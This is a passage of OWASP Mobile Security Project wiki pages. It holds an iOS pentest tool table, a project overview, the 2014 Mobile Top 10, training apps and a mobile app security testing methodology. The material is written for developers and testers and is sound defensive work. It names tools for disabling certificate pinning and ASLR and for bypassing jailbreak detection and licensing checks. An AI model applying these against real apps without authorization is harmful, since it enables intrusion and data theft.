<tr>
<td>Filemon</td>
<td>http://www.newosxbook.com/files/filemon.iOS</td>
<td>Monitor realtime iOS file system</td>
</tr>
<tr>
<td>FileDP</td>
<td>http://www.securitylearn.net/2012/10/18/extracting-data-protection-class-from-files-on-ios/</td>
<td>Audits data protection of files</td>
</tr>
<tr>
<td>BinaryCookieReader</td>
<td>http://securitylearn.net/wp-content/uploads/tools/iOS/BinaryCookieReader.py</td>
<td>Read cookies.binarycookies files </td>
</tr>
<tr>
<td>lsof ARM Binary</td>
<td>https://github.com/u35tpus/iosrep/tree/master/lsof</td>
<td> list of all open files and the processes that opened them </td>
</tr>
<tr>
<td>lsock ARM Binary</td>
<td>http://www.newosxbook.com/index.php?page=downloads</td>
<td> monitor socket connections </td>
</tr>
<tr>
<td>PonyDebugger Injected</td>
<td>https://github.com/dtrukr/PonyDebuggerInjected</td>
<td> Injected via Cycript to enable remote debugging </td>
</tr>
<tr>
<td>Weak Class Dump</td>
<td>https://raw.github.com/limneos/weak_classdump/master/weak_classdump.cy</td>
<td> Injected via Cycript to do class-dump (for when you cant un-encrypt the binary) </td>
</tr>
<tr>
<td>TrustME</td>
<td>https://github.com/intrepidusgroup/trustme</td>
<td> Lower level tool to disable SSL certificate validation - including certificate pinning (for everything else but NSURL)</td>
</tr>
<tr>
<td>Mac Robber</td>
<td>http://www.sleuthkit.org/mac-robber/download.php</td>
<td> C code, forensic tool for imaging filesystems and producing a timeline </td>
</tr>
<tr>
<td>USBMux Proxy</td>
<td>https://github.com/st3fan/usbmux-proxy</td>
<td> command line tool to connect local TCP port sto ports on an iPhone or iPod Touch device over USB. </td>
</tr>
<tr>
<td>iFunBox</td>
<td>http://www.i-funbox.com/</td>
<td>Filesystem access (no jailbreak needed), USBMux Tunneler, .ipa installer</td>
</tr>
<tr>
<td>iNalyzer</td>
<td>https://appsec-labs.com/iNalyzer/</td>
<td>iOS Penetration testing framework</td>
</tr>
<tr>
<td>removePIE</td>
<td>https://github.com/peterfillmore/removePIE</td>
<td>Disables ASLR of an application</td>
</tr>
<tr>
<td>snoop-it</td>
<td>https://code.google.com/p/snoop-it/</td>
<td>A tool to assist security assessments and dynamic analysis of iOS Apps, includes runtime views of obj-c classes and methods, and options to modify those values</td>
</tr>
<tr>
<td>idb</td>
<td>https://github.com/dmayer/idb</td>
<td>A GUI (and cmdline) tool to simplify some common tasks for iOS pentesting and research.</td>
</tr>
</table>

== Related Articles ==
<ul>
<li>http://www.slideshare.net/jasonhaddix/pentesting-ios-applications</li>
<li>https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing_Guide</li>
<li>http://pen-testing.sans.org/blog/pen-testing/2011/10/13/mobile-application-assessments-attack-vectors-and-arsenal-inventory#</li>
<li>http://www.securitylearn.net/2012/09/07/penetration-testing-of-iphone-applications-part-3/</li>
<li>Jonathan Zdziarski “Hacking and securing iOS applications” (ch. 6,7,8)</li>
<li>http://www.mdsec.co.uk/research/iOS_Application_Insecurity_wp_v1.0_final.pdf</li>
</ul>

= Authors and Primary Editors =
Oana Cornea - oanacornea123[at]gmail.com

Jason Haddix - jason.haddix[at]hp.com

= Other Cheatsheets =
{{Cheatsheet_Navigation}}

[[Category:Cheatsheets]]

OWASP Mobile Security Project

2014-06-29T21:33:05Z

Jason Haddix:

= Home =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|2400x160px|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== OWASP Mobile Security Project ==

The OWASP Mobile Security Project is a centralized resource intended to give developers and security teams the resources they need to build and maintain secure mobile applications. Through the project, our goal is to classify mobile security risks and provide developmental controls to reduce their impact or likelihood of exploitation.

Our primary focus is at the application layer. While we take into consideration the underlying mobile platform and carrier inherent risks when threat modeling and building controls, we are targeting the areas that the average developer can make a difference. Additionally, we focus not only on the mobile applications deployed to end user devices, but also on the broader server-side infrastructure which the mobile apps communicate with. We focus heavily on the integration between the mobile application, remote authentication services, and cloud platform-specific features.

<br/>

'''We have a Google Doc where anyone who wants to be involved with the project can add their thoughts, suggestions, and take ownership of initiatives - [https://docs.google.com/document/d/1bScrvrLJLOHcSbztjBxYoN-jN3kR8bViy9tF8Nx0c08/edit Click here]. There are various tasks that people have started over the past 6 months with varying levels of quality and completeness.'''

This project is still a work in progress. We are small group doing this work and could use more help! If you are interested, please contact one of the project leads or feel free to visit [https://groups.google.com/a/owasp.org/forum/#!forum/owasp-mobile-top-10-risks the mailing list] as well!

| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |

== Email List ==

[[Image:Asvs-bulb.jpg]] [https://lists.owasp.org/mailman/listinfo/owasp-mobile-security-project Project Email List]

== Project Leaders ==
{{Template:Contact
| name = Jack Mannino
| email = Jack@nvisiumsecurity.com
| username = Jack Mannino
}} <br/>
{{Template:Contact | name = Mike Zusman
| email = mike.zusman@owasp.org
| username = schmoilito }}<br/>
{{Template:Contact
| name = Tony DeLaGrange
| email = mobisec@secureideas.net
| username = Tony DeLaGrange
}}<br/>
{{Template:Contact
| name = Sarath Geethakumar
| email = sarath.geethakumar@owasp.org
| username = Sarath Geethakumar
}}<br/>
{{Template:Contact
| name = Tom Eston
| email = teston@securestate.com
}}<br/>
{{Template:Contact
| name = Don Williams
}}<br/>
{{Template:Contact
| name = Jason Haddix
| email = jason.haddix@hp.com
| username = Jason Haddix
}}<br/>
== Contributors ==
{{Template:Contact
| name = Zach Lanier
| email = zach.lanier@n0where.org
| username = Zach_Lanier
}}<br/>
{{Template:Contact
| name = Jim Manico
| email = jim.manico@owasp.org
| username = jmanico
}}<br/>
{{Template:Contact
| name = Ludovic Petit
| email = ludovic.petit@owasp.org
| username = Ludovic Petit
}}<br/>
{{Template:Contact
| name = Swapnil Deshmukh
| email = sd.swapz@gmail.com
| username = Swapnil Deshmukh
}}<br/>
{{Template:Contact
| name = Beau Woods
| email = owasp@beauwoods.com
| username = Beau Woods
}}<br/>
{{Template:Contact
| name = Jonathan Carter
| email = jonathan.carter@owasp.org
| username = Jonathan Carter
}}
|}

= Top 10 Mobile Risks =

== Top 10 Mobile Risks - Re-Release Candidate 2014 v1.0 ==
[[File:2014-01-26 20-23-29.png|right|550px]]
*[[Mobile_Top_10_2014-M1|M1: Weak Server Side Controls ]]
*[[Mobile_Top_10_2014-M2|M2: Insecure Data Storage ]]
*[[Mobile_Top_10_2014-M3|M3: Insufficient Transport Layer Protection ]]
*[[Mobile_Top_10_2014-M4|M4: Unintended Data Leakage ]]
*[[Mobile_Top_10_2014-M5|M5: Poor Authorization and Authentication ]]
*[[Mobile_Top_10_2014-M6|M6: Broken Cryptography ]]
*[[Mobile_Top_10_2014-M7|M7: Client Side Injection ]]
*[[Mobile_Top_10_2014-M8|M8: Security Decisions Via Untrusted Inputs ]]
*[[Mobile_Top_10_2014-M9|M9: Improper Session Handling ]]
*[[Mobile_Top_10_2014-M10|M10: Lack of Binary Protections ]]

== Project Leads, Credit, and Contributions ==

* ''' [[Mobile_Top_Contributions|Mobile Top Ten Contributions Page ]] '''

== Project Methodology ==

* '''We adhered loosely to the [https://www.owasp.org/index.php/Top_10_2013/ProjectMethodology OWASP Web Top Ten Project methodology]. '''

== Archive ==
* The list below is the OLD release candidate v1.0 of the OWASP Top 10 Mobile Risks.  This list was initially released on September 23, 2011 at Appsec USA.  

*** The original presentation can be found here: [http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks SLIDES]<br>
*** The corresponding video can be found here: [http://www.youtube.com/watch?v=GRvegLOrgs0 VIDEO]
*** [[Mobile_Top_10_2012|2011-12 Mobile Top Ten for archive purposes]]
== About this list ==
In 2013 we polled the industry for new vulnerability statistics in the field of mobile applications. What you see here is a result of that data and a representation of the mobile application threat landscape.

== 2014 Roadmap ==

* More updates to the wiki content; including cross-linking to testing guides, more visual exercises, etc.
* A PDF release.

= Mobile Tools =
== iMAS ==

iMAS is a collaborative research project from the MITRE Corporation focused on open source iOS security controls. Today, iOS meets the enterprise security needs of customers, however many security experts cite critical vulnerabilities and have demonstrated exploits, which pushes enterprises to augment iOS deployments with commercial solutions. The iMAS intent is to protect iOS applications and data beyond the Apple provided security model and reduce the adversary’s ability and efficiency to perform recon, exploitation, control and execution on iOS mobile applications. iMAS will transform the effectiveness of the existing iOS security model across major vulnerability areas including the System Passcode, jailbreak, debugger / run-time, flash storage, and the system keychain. Research outcomes include an open source secure application framework, including an application container, developer and validation tools/techniques.

[https://www.owasp.org/index.php/OWASP_iMAS_iOS_Mobile_Application_Security_Project iMas Project Page]

The source code for iMAS is available on GitHub: [https://github.com/project-imas/about iMAS Source Code]

== GoatDroid ==

OWASP GoatDroid is a fully functional and self-contained training environment for educating developers and testers on Android security. GoatDroid requires minimal dependencies and is ideal for both Android beginners as well as more advanced users. The project currently includes two applications: FourGoats, a location-based social network, and Herd Financial, a mobile banking application. There are also several features that greatly simplify usage within a training environment or for absolute beginners who want a good introduction to working with the Android platform.

As the Android SDK introduces new features, the GoatDroid contributors will strive to implement up-to-date lessons that can educate developers and security testers on new security issues. The project currently provides coverage for most of the OWASP Top 10 Mobile Risks and also includes a bunch of other problems as well.

You can find GoatDroid on GitHub: [https://github.com/jackMannino/OWASP-GoatDroid-Project GoatDroid Source Code]

[https://www.owasp.org/index.php/Projects/OWASP_GoatDroid_Project GoatDroid Project Page]

== iGoat ==

iGoat is a learning tool for iOS developers (iPhone, iPad, etc.). It was inspired by the WebGoat project, and has a similar conceptual flow to it.

As such, iGoat is a safe environment where iOS developers can learn about the major security pitfalls they face as well as how to avoid them. It is made up of a series of lessons that each teach a single (but vital) security lesson.

The lessons are laid out in the following steps:

# Brief introduction to the problem.
# Verify the problem by exploiting it.
# Brief description of available remediations to the problem.
# Fix the problem by correcting and rebuilding the iGoat program.

Step 4 is optional, but highly recommended for all iOS developers. Assistance is available within iGoat if you don't know how to fix a specific problem.

iGoat is free software, released under the GPLv3 license.

[https://www.owasp.org/index.php/OWASP_iGoat_Project iGoat Project Page]

The iGoat source code is available on Google Code [http://code.google.com/p/owasp-igoat/ iGoat Source Code]

== Damn Vulnerable iOS Application ==

Damn Vulnerable iOS application is a project started by Prateek Gianchandani which gives mobile testers and developers an iOS application to practice attacking/defending skill sets. Each challenge area corresponds to an in-depth article designed to teach the fundamentals of mobile security on the iOS platform. Some challenge categories include multiple challenge types.

The current challenge categories:

* Insecure Data Storage (4 exercises)
* Jailbreak Detection (2 exercises)
* Runtime Manipulation (3 exercises)
* Transport Layer Security (1 exercise)
* Client Side Injection (1 exercise)
* Broken Cryptography (1 exercise)
* Binary Patching (4 exercises)

[http://damnvulnerableiosapp.com DVIA Home Page]

[https://www.owasp.org/index.php/OWASP_DVIA DVIA OWASP Project Page]

[https://github.com/prateek147/DVIA DVIA Github Source]

[http://damnvulnerableiosapp.com/#learn DVIA Learning Resources]

== MobiSec ==

The MobiSec Live Environment Mobile Testing Framework project is a live environment for testing mobile environments, including devices, applications, and supporting infrastructure. The purpose is to provide attackers and defenders the ability to test their mobile environments to identify design weaknesses and vulnerabilities. The MobiSec Live Environment provides a single environment for testers to leverage the best of all available open source mobile testing tools, as well as the ability to install additional tools and platforms, that will aid the penetration tester through the testing process as the environment is structured and organized based on an industry‐proven testing framework. Using a live environment provides penetration testers the ability to boot the MobiSec Live Environment on any Intel-based system from a DVD or USB flash drive, or run the test environment within a virtual machine.

[https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_MobiSec Project Page]

MobiSec can be downloaded from Sourceforge: [http://sourceforge.net/p/mobisec/wiki/Home/ MobiSec Download Repository]

== Androick ==

Androick is a collaborative research project from PHONESEC Ltd. With our tool, you can evaluate some risks on Android mobile applications.
Androick is a tool that allows any user to analyze an Android application. It can get the apk file, all the datas and the databases in sqlite3 and csv format.
Only for Pentesters or Researchers.

[https://www.owasp.org/index.php/Projects/OWASP_Androick_Project Androick Project Page]
== OWASP Summer of Code 2008 ==

The OWASP Foundation sponsored the OWASP Application Security Verification Standard Project during the OWASP Summer of Code 2008.

= Mobile Security Testing =

== Introduction ==

A major priority of the OWASP Mobile Security Project is to help standardize and disseminate mobile application testing methodologies. While specific techniques exist for individual platforms, a general mobile threat model can be used to assist test teams in creating a mobile security testing methodology for any platform. The outline which follows describes a general mobile application testing methodology which can be tailored to meet the security tester’s needs. It is high level in some places, and over time will be customized on a per-platform basis.

This guide is targeted towards application developers and security testers. Developers can leverage this guide to ensure that they are not introducing the security flaws described within the guide. Security testers can use it as a reference guide to ensure that they are adequately assessing the mobile application attack surface. The ideal mobile assessment combines dynamic analysis, static analysis, and forensic analysis to ensure that the majority of the mobile application attack surface is covered.

On some platforms, it may be necessary to have root user or elevated privileges in order to perform all of the the required analysis on devices during testing. Many applications write information to areas that cannot be accessed without a higher level of access than the standard shell or application user generally has. For steps that generally require elevated privileges, it will be stated that this is the case.

This guide is broken up into three sections:
*'''Information Gathering-''' describes the steps and things to consider when you are in the early stage reconnaissance and mapping phases of testing as well as determining the application’s magnitude of effort and scoping.
*'''Static Analysis'''- Analyzing raw mobile source code, decompiled or disassembled code.
*'''Dynamic Analysis''' - executing an application either on the device itself or within a simulator/emulator and interacting with the remote services with which the application communicates. This includes assessing the application’s local interprocess communication surface, forensic analysis of the local filesystem, and assessing remote service dependencies.

=== How To Use This Resource ===

As this guide is not platform specific, you will need to know the appropriate techniques & tools for your target platform. The OWASP Mobile Security Project has also developed a number of other supporting resources which may be able to be leveraged for your needs.

'''In this current draft release, the guide is a work in progress. We need additional contributors to help fill in the blanks. If you think something is missing (there certainly is), add it.'''

As this guide is not platform specific, you will need to know the appropriate techniques & tools for your target platform. The OWASP Mobile Security Project has also developed a number of other supporting resources which may be able to be leveraged for your needs,

The steps required to properly test an Android application are very different than those of testing an iOS application. Likewise, Windows Phone is very different from the other platforms. Mobile security testing requires a diverse skillset over many differing operating systems and a critical ability to analyze various types of source code.

In many cases, a mobile application assessment will require coverage in all three areas identified within this testing reference. A dynamic assessment will benefit from an initial thorough attempt at Information Gathering, some level of static analysis against the application’s binary, and a forensic review of the data created and modified by the application’s runtime behavior.

Please use this guide in an iterative fashion, where work in one area may require revisiting previous testing steps. As an example, after completing a transaction you may likely need to perform additional forensic analysis on the device to ensure that sensitive data is removed as expected and not cached in an undesired fashion. As you learn more about the application at runtime, you may wish to examine additional parts of the code to determine the best way to evade a specific control. Likewise, during static analysis it may be helpful to populate the application with certain data in order to prove or refute the existence of a security flaw.

In the future, contributors to the testing guide should consider adding entries under each section relevant to a specific platform. Over time, OWASP contributors will write platform specific guides and expand upon this body of knowledge.

If a specific area of interest is not covered in this guide, please feel free to either:

*write the material yourself by registering for a wiki account and contributing content: [https://www.owasp.org/index.php/Special:RequestAccount Wiki Registration]
*bring this up as a topic on the Mobile Project’s mailing list: [https://lists.owasp.org/mailman/listinfo/owasp-mobile-security-project Mobile Mailing List]

Collaboration on building the guide is being performed within Google Docs. You can find the latest and greatest material here: [https://docs.google.com/document/m/?id=1N7zMXlFHtWfc00xa6lRHnVB60U4BZO4SbUrWYMbojVM&pli=1&login=1 Testing Guide Google Doc]

== Information Gathering ==

As a result of this initial information gathering exercise, the tester will be better prepared for the future testing phases. Testers, Developers and Security people often fail to take the time to learn the target application and supporting infrastructure, opting to dive in blind, possibly losing valuable time and missing possible attack vectors. Without a solid understanding of how the application “should” work as well as the technologies in use, the tester will not be able to identify when the application behaves in a manner that it “shouldn’t”.

Prerequisites of this phase may require specific operating systems, platform specific software development kits (SDK’s), rooted or jailbroken devices, the ability to man-in-the-middle secure communications (i.e. HTTPS) and bypass invalid certificate checks.

*Manually navigate through the running application to understand the basic functionality and workflow of the application. This can be performed on a real device or within a simulator/emulator. For deeper understanding of application functionality tester can proxy and sniff all network traffic from either a physical mobile device or an emulator/simulator recording and logging traffic (if your proxy tool permits logging, which most should).

*Identify the networking interfaces used by the application, for instance:
**Mobile Communication (GSM, GPRS, EDGE, LTE)
**Wireless (Wi-Fi (802.11 standards), Bluetooth, NFC)
**Virtual Interfaces (i.e. VPN)

*Determine what the application supports for access 3G, 4G, wifi and or others

*What networking protocols are in use?
**Are secure protocols used where needed?
**Can they be switched with insecure protocols?

*Does the application perform commerce transactions?
**Credit card transactions and/or stored payment information (certain industry regulations may be required (i.e. PCI DSS)).
**In-app purchasing of goods or features
**Make note for future phases to determine does the application store payment information? How is payment information secured?

*Monitor and identify the hardware components that the application may potentially interact with
**NFC
**Bluetooth
**GPS
**Camera
**Microphone
**Sensors
**USB

*Perform open source intelligence gathering (search engines, source code repositories, developer forums, etc.) to identify source code or configuration information that may be exposed (i.e. 3rd party components integrated within the application)

*What frameworks are in use?

*Identify if the application appears to interact with any other applications, services, or data such as:
**Telephony (SMS, phone)
**Contacts
**Auto correct / dictionary services
**Receiving data from apps and other on-device services
**Google Wallet
**iCloud
**Social networks (i.e. Facebook, Twitter, LinkedIn, Google+)
**Dropbox
**Evernote
**Email
**Etc.

*Can you determine anything about the server side application environment?
**Hosting provider (AWS, App Engine, Heroku, Rackspace, Azure, etc.)
**Development environment (Rails, Java, Django, ASP.NET, etc.)
**Does the application leverage Single Sign On or Authentication APIs (Google Apps, Facebook, iTunes, OAuth, etc.)
**Any other APIs in use
***Payment gateways
***SMS messaging
***Social networks
***Cloud file storage
***Ad networks

*Perform a thorough crawl of exposed web resources and sift through the requests and responses to identify potentially interesting data or behavior
**Leaking sensitive information (i.e. credentials) in the response
**Resources not exposed through the UI
**Error messages
**Cacheable information

== Static Analysis ==

There are two primary ways static analysis will generally be performed on a mobile application:
#Analyzing source code obtained from development team (prefered)
#Using a compiled binary.

Some level of static analysis should be performed for both dynamic and forensic analysis, as the application’s code will almost always provide valuable information to the tester (i.e. logic, backend targets, APIs, etc).

In scenarios where the primary goal is to identify programmatic examples of security flaws, your best bet is to review pure source code as opposed to reverse engineering compiled software. For source code reviews, it is highly beneficial to have access to either a development or production instance of any web services. This includes both source code and a working test environment to perform the assessment within in order to expedite understanding of the code.

=== Getting Started ===
*If the source is not directly available, decompile or disassemble the application’s binary
**extract the application from the device
**follow the appropriate steps for your platform’s application reverse engineering
**some applications may also require decryption prior to reverse engineering (note: decryption and code obfuscation are not the same thing)

*Review the permissions the application requests as well as the resources that it is authorized to access (i.e. AndroidManifest.xml, iOS Entitlements)

*Are there any easy to identify misconfigurations within the application found within the configuration files? Debugging flags set, world readable/writable permissions, etc.

*What frameworks are in use? Is the application built using a cross-platform framework?

*Identify the libraries in use including both platform provided as well as third party. Perform a quick review on the web to determine if these libraries:
**are up to date
**are free of vulnerabilities
**expose functionality that requires elevated privileges (access to location or contact data)
**native code

*Does the application check for rooted/jailbroken devices? How is this done? How can this be circumvented? Is it as easy as changing the case of a file name or name of executable or path?

*Determine what types of objects are implemented to create the various views within the application. This may significantly alter your test cases, as some views implement web browser functionality while others are native UI controls only.

*Is all code expected to run within the platform’s standard runtime environment, or are some files/libraries dynamically loaded or called outside of that environment at runtime?

*Attempt to match up every permission that the application requests with an actual concrete implementation of it within the application. Often, developers request more permission than they actually need. Identify if the same functionality could be enabled with lesser privileges.

*Locate hard coded secrets within the application such as API keys, credentials, or proprietary business logic.

*Identify every entry point for untrusted data entry and determine how it enforces access controls, validates and sanitizes inbound data, and passes the data off to other interpreters
**From web service calls
**Receiving data from other apps and on-device services
**Inbound SMS messages
**Reading information from the filesystem

=== Authentication ===

*Locate the code which handles user authentication through the UI. Assess the possible methods of user impersonation via vectors such as parameter tampering, replay attacks, and brute force attacks.

*Determine if the application utilizes information beyond username/password such as
**contextual information (i.e.- device identifiers, location)
**certificates
**tokens

*Does the application utilize visual swipe or touch passwords vs. conventional usernames and passwords?
**Assess the method of mapping the visual objects to an authentication string to determine if adequate entropy exists

*Does the application implement functionality that permits inbound connections from other devices? (i.e.- Wi-Fi Direct, Android Beam, network services)
**Does the application properly authenticate the remote user or peer prior to granting access to device resources?
**How does the application handle excessive failed attempts at authentication?
**are failed attempts logged?
**what mechanisms exist to inform the user of a potential attack?

*Single Sign On, e.g.
**OAuth
**Facebook
**Google Apps

*SMS
**How is the sender authenticated?
***password
***header information
***Other mechanism?
**Are one time passwords (OTP) used or is other sensitive account data transmitted via SMS?
***Can other applications access this data?

*Push Notifications
**If the application consumes information via push notifications, how does the application verify the identity of the sender?

=== Authorization ===
*Review file permissions for files created at runtime

*Determine if it is possible to access functionality not intended for your role

**Identify if the application has role specific functionality within the mobile application

**Locate any potential flags or values that may be set on the client from any untrusted source that can be a point of privilege elevation such as
***databases
***flat files
***HTTP responses

**Find places within an application that were not anticipated being directly accessed without following the application’s intended workflow

*Licensing
**Can licensing checks be defeated locally to obtain access to paid-for data resources? (i.e.- patching a binary, modifying it at runtime, or by modifying a local configuration file)
**Does the code suggest that licensed content is served with a non-licensed app but restricted by UI controls only?
**Are licensing checks performed properly by the server or platform licensing services?
**How does the application detect and respond to tampering?
***Are alerts sent to and expected by the developer?
***Does the application fail open or fail closed?
***Does the application wipe its data?

=== Session Management ===

*Ensure that sessions time out locally as well as server side

*Is sensitive information utilized within the application flushed from memory upon session expiration?

=== Data Storage ===

*Encryption
**Are the algorithms used “best of breed” or do they contain known issues?
**How are keys derived from i.e. a password?
**Based on the algorithms and approaches used to encrypt data, do implementation issues exist that degrade the effectiveness of encryption?
**How are keys managed and stored on the device? Can this reduce the complexity in breaking the encryption?

*Identify if the application utilizes storage areas external to the “sandboxed” locations to store unencrypted data such as:
**Places with limited access control granularity (SD card, tmp directories, etc.)
**Directories that may end up in backups or other undesired locations (iTunes backup, external storage, etc.)
**Cloud storage services such as Dropbox, Google Drive, or S3

*Does the application write sensitive information to the file system at any point, such as:
**Credentials
***Username and/or password
***API keys
***Authentication tokens
**Payment information
**Patient data
**Signature files

*Is sensitive information written to data stores via platform exposed APIs such as contacts?

=== Information Disclosure ===

*Logs
**Does the application log data? Is sensitive information accessible?
**How are the logs accessed, if so, and by which mechanism/functionality? Is log access protected?
**Can any of the logged information be considered a privacy violation?
**Is the device identifier sent that could be used to identify the user? (i.e.UDID in Apple devices)

*Caches
**Predictive text
**Location information
**Copy and paste
**Application snapshot
**Browser cache
**Non-standard cache locations (i.e the various SQLite databases that apps can create if they use HTML UI components)

*Exceptions
**Does sensitive data leak in crash logs?

*Third Party Libraries and APIs
**What permissions do they require?
**Do they access or transmit sensitive information?
Review licensing requirements for any potential violations.
**Can their runtime behavior expose users to privacy issues and unauthorized tracking?

=== Web Application Issues ===

*XSS and HTML Injection
**Identify places where the application passes untrusted data into a web view or browser
**Determine if the application properly output encodes or sanitizes the data within the appropriate context
*Command Injection (if the application utilizes a shell)
**Where the application permits usage of the shell, identify the entry points to manipulate or alter the commands via user input or external untrusted data
**Determine if an attacker can inject arbitrary commands or manipulate the intended command in any way
*CSRF
*SQL Injection
*Cookies
*HTML5

=== Networking ===

*Are insecure protocols used to send or receive sensitive information? Examples- FTP, SNMP v1, SSH v1

*Are there any known issues with the specific libraries you are using to implement the protocol?

=== Transport Layer Protection ===
*Does the application properly implement Certificate Pinning?

*Are certificates validated to determine if:
**The certificate has not expired
**The certificate was issued by a valid certificate authority
**The remote destination information matches the information within the certificate?

*Are certificates validated only by the operating system or also by the application that relies on it?

*Identify if code exist to alter the behavior for traffic transiting different interfaces (i.e.- 3G/4G comms vs. Wi-Fi)? If so, is encryption applied universally across each of them

=== Helpful Search Strings and Regular Expressions ===
-To do

== Dynamic Analysis ==

Armed with data collected during the Information Gathering and Static Analysis phases, the tester can begin an informed vulnerability assessment of the mobile application client, server and associated services.

Dynamic analysis is conducted against the backend services and APIs and the type of tests varies depending on mobile application type.

=== Application Types ===

*Native Mobile Application: Native mobile applications can be installed on to the device. This type of applications generally store most of their code on the device. Any information required can be requested to the server using the HTTP/s protocol

*Web services for Mobile Application: Native mobile application that uses SOAP or REST based web services to communicate between client and Server

*Mobile Browser Based Application: Web browser based applications can be accessed using device’s browsers such as Safari or Chrome. Most of the commercial applications are nowadays specifically designed and optimized for mobile browsers. These applications are no different than traditional web application and all the web application vulnerabilities apply to these apps and these should be tested as traditional web apps.

*Mobile Hybrid Applications:Applications can leverage web browser functionality within native applications, blending the risks from both classes of applications.

In this phase, the mobile client, backend services, and host platform is analyzed/scanned in attempt to uncover potential risks, vulnerabilities and threats. The use of an intercepting proxy tool as well as automated vulnerability scanners are core to this phase. In many cases, you will also need some type of shell access to the device.

The following outline can be used as a “Dynamic Analysis” guide in planning a mobile assessment.

=== Establishing a Baseline ===

*Generate File System Baseline Fingerprint (before app installation)
**Application interactions with the host file system must be reviewed and analyzed at various stages of testing; starting with baseline capture. This may require a shell or GUI depending on platform and/or preference.

*Install, Configure and Use the Application
**Manually inspect the file system to determine what files/databases were created, what and how data is stored. Did the application store sensitive data unencrypted or trivially protected (i.e. encoded)?
**Generally, pay attention to credentials, payment information, or other highly sensitive information being saved to the device. Also take a look at databases, log files, predictive text caches, and crash logs.

=== Debugging ===

*Attach a debugger to an application to step through code execution and setting breakpoints at interesting code within the application

*Monitor logged messages and notifications generated at runtime

*Observe interprocess communications between the target application and other applications and services running on the mobile device.

=== Active Testing ===

==== Local Testing ====

*Exposed IPC interfaces
**Sniff
**Fuzz
**Bypass authorization checks

===== Cryptography =====

*Brute force attacks against keys, pins, and hashes
*Attempt to reconstruct encrypted data through recovery of keys, hardcoded secrets, and any other information exposed by the application

===== Web Applications =====

*XSS and HTML Injection
**Is it possible to inject client side code (i.e. JavaScript) or HTML into the application to either modify the inner working of the application or it's user interface?

*Command Injection (if the application utilizes a shell)

*CSRF

*SQL Injection

*Cookies
**Are cookies issued by a server secured by using the HTTP-only and Secure flag?
**Is there any sensitive information stored in the cookies?

*HTML5 Storage

===== Authentication =====

*Assess the methods an application uses to authenticate peers
**NFC
**SMS
**Push notifications
**Across IPC channels (identify the calling application’s privileges and identity)

===== Authorization =====
*Instrument, patch, or interact with application at runtime to bypass methods intended to prevent usage of privileged or premium features

*Determine if configuration or locally stored data can be manipulated in order to elevate a user’s privileges

*Check the filesystem permissions for any files created at runtime

===== File System Analysis =====

*Assess the application’s behavior throughout it’s lifecycle to determine if special functionality is triggered to persist an application’s state when it enters different stages:
**Placed into the foreground
**Sent into the background
**Upon exiting the application

*Data storage in Cache

*Looking for artifacts left on device

*Unencrypted data storage on the device

*Encryption of data in backups

*Username/password, or app-specific unique device id stored on the device

*Application Permissions , Privileges and Access controls on the device

*Generally, pay attention to credentials, payment information, or other highly sensitive information being saved to the device. Also take a look at log files, predictive text caches, and crash logs.

*Is sensitive information cached within the application’s UI back stack?

*Utilize forensic tools to determine if deleted data can be recovered from the filesystem as well as within databases

===== Memory Analysis =====

*Determine if sensitive information persists within memory after performing the following actions:
**Logging out of the application
**Transition between UI components

*Is it possible to obtain encryption keys, credentials, payment information and other sensitive information by dumping device or application memory?

==== Remote Application/Service Testing ====

===== Authentication =====

*What methods are available (3G, 4G, Wifi, etc)?

*What happens if the remote authentication service becomes unavailable?

*Assess strength of password requirements

*Test how account lockouts are implemented

*Analyze (monitor traffic) how each method performs authentication. Note target wifi as this is a common area where authentication can be weak. Ensure authentication is robust and not based on trivial attributes (i.e. MDN, ESN, etc).

*Verify that authentication tokens are terminated after a user initiates a password reset

*Single Sign On (SSO)

*SMS Based
**One Time Passwords (OTP)
**Two Factor Authentication

*Push Notifications

*Licensing

===== Authorization =====

*What happens if the remote authorization handling service becomes unavailable?

*Test if direct access to backend resources is possible

*Access controls to server side resources not enforced

*Vertical and horizontal privilege escalation

===== Session Management =====

*Entropy analysis
*Device identifier related?
*Are session tokens refreshed between logouts?
*Lifetime and expiration
*Handling the session token on the device (stored, in memory, etc.)
*Privilege Escalation
*Ineffective Session Termination

===== Transport Layer Testing =====
*Man-in-the-middle attacks
*Eavesdropping
*SSL checks (cypher strengths/weakness etc.)

===== Server Side Attacks =====

*Triggering unhandled exceptions
*Cross-Site Scripting
*SQL Injection
*XML Bombs
*Buffer overflow
*Unrestricted File Upload
*Open Redirect

===== Server, Network & Application Scanning =====

*Based on prior phases you should have 1 or more target servers (i.e. URLs) as candidates for automated vulnerability scanning. Mobile applications often leverage existing web services/applications (i.e. hybrid applications) which must be tested for security vulnerabilities.

===== Conclusion =====

Mobile applications are continuing to mature and evolve thus to be effective, security testers must strive to advance their knowledge and skills. Please check back periodically for updates and share your feedback with us.

= Mobile Cheat Sheet =
== Mobile Cheat Sheet Series ==

Cheat sheets provide the information most relevant to a developer or security engineer with minimal "fluff". The goal of the project is to build a collection of cheat sheets that provide actionable, useful, and straight to the point guidance for a plethora of mobile security issues.

== Platform Agnostic ==

[https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Dangers_of_Jailbreaking_and_Rooting_Mobile_Devices Dangers of Jailbreaking & Rooting Mobile Devices]

== Android ==

== iOS ==
<ul>
<li>[https://www.owasp.org/index.php/IOS_Developer_Cheat_Sheet iOS Developer Cheat Sheet]</li>
<li>[https://www.owasp.org/index.php/IOS_Application_Security_Testing_Cheat_Sheet iOS Application Security Testing Cheat Sheet]</li>
</ul>

== Windows Phone ==

== RIM ==

= Secure Mobile Development =
== Secure Mobile Development Guidelines Objective==

The OWASP Secure Development Guidelines will provide developers with the knowledge they need to build secure mobile applications. An extendable framework will be provided that includes the core security flaws found across nearly all mobile platforms. It will be a living reference where contributors can plug in newly exposed APIs for various platforms and provide good/bad code examples along with remediation guidance for those issues.

= Top 10 Mobile Controls =
==OWASP/ENISA Collaboration==

